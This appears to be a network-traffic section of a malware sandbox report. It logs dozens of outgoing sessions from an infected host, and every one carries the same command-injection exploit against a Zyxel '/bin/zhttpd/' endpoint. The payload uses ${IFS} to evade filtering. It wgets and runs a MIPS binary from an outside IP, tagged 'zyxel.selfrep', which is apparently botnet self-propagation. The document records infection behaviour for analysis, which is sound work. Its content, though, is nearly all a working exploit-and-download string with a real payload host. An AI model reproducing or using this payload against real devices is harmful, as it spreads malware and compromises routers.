                                        Jan 14, 2024 16:18:41.377449989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3424192.168.2.1335796112.204.127.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377499104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3425192.168.2.134943481.184.113.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377543926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3426192.168.2.134700436.187.240.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377597094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3427192.168.2.134044251.32.56.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377634048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3428192.168.2.1355522155.76.45.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377671003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3429192.168.2.134339289.57.157.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377696991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3430192.168.2.1336646171.174.223.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377752066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3431192.168.2.1360378137.116.226.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377783060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3432192.168.2.135229254.116.244.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377825975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3433192.168.2.1359362102.45.66.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377875090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3434192.168.2.1348928154.202.145.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377918959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3435192.168.2.134779045.235.228.92443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377954006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3436192.168.2.1354088136.86.84.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377990007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3437192.168.2.1337106220.176.166.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.378051043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3438192.168.2.135731898.74.238.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.378114939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3439192.168.2.134288048.167.229.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.378144026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3440192.168.2.1353284160.247.61.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.378176928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3441192.168.2.133352423.65.146.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.378226042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3442192.168.2.1358716148.44.165.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.378269911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3443192.168.2.1350938201.30.97.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.378294945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3444192.168.2.1338374211.86.76.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.378345966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3445192.168.2.1335982170.252.201.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.378398895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3446192.168.2.136072666.14.5.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.378427982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3447192.168.2.135171052.74.92.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.378463984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3448192.168.2.135541627.196.134.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.378516912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3449192.168.2.135318264.230.91.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.378550053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3450192.168.2.1336198213.215.241.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.378585100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3451192.168.2.1356080150.186.78.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.378809929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3452192.168.2.1352228171.206.9.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.379733086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3453192.168.2.1356262205.26.106.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.380039930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3454192.168.2.1334998135.178.124.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.380886078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3455192.168.2.133376268.215.120.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.382831097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3456192.168.2.1359434140.94.88.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.382884026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3457192.168.2.134341276.41.4.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.382971048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3458192.168.2.1356460117.9.245.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383003950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3459192.168.2.1336788122.147.11.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383053064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3460192.168.2.1354944172.234.154.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383095980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3461192.168.2.1348690194.60.150.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383131027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3462192.168.2.13528029.42.8.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383174896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3463192.168.2.133771273.218.105.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383230925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3464192.168.2.1353174193.235.251.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383244991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3465192.168.2.1347154118.207.26.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383268118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3466192.168.2.1351790153.153.2.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383287907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3467192.168.2.134790483.183.160.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383358955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3468192.168.2.1334610175.236.21.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383394003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3469192.168.2.1336358125.137.162.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383431911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3470192.168.2.1359480143.115.38.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383464098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3471192.168.2.1359904101.225.24.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383526087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3472192.168.2.135911495.122.239.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383573055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3473192.168.2.1354740100.62.173.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383584976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3474192.168.2.134691084.177.13.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383656979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3475192.168.2.1360736116.38.11.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383675098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3476192.168.2.1348440166.61.175.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383713961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3477192.168.2.134965480.223.199.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383789062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3478192.168.2.134415892.8.220.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383821964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3479192.168.2.135736098.224.209.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383857012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3480192.168.2.1348922203.110.1.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383877039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3481192.168.2.1348966219.4.152.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383893967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3482192.168.2.134350866.211.31.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383955002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3483192.168.2.1337390194.124.126.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.383985043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3484192.168.2.134246224.12.136.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.384038925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3485192.168.2.1342504102.122.180.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.384089947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3486192.168.2.1335240159.43.141.10443
                                        TimestampBytes transferredDirectionData
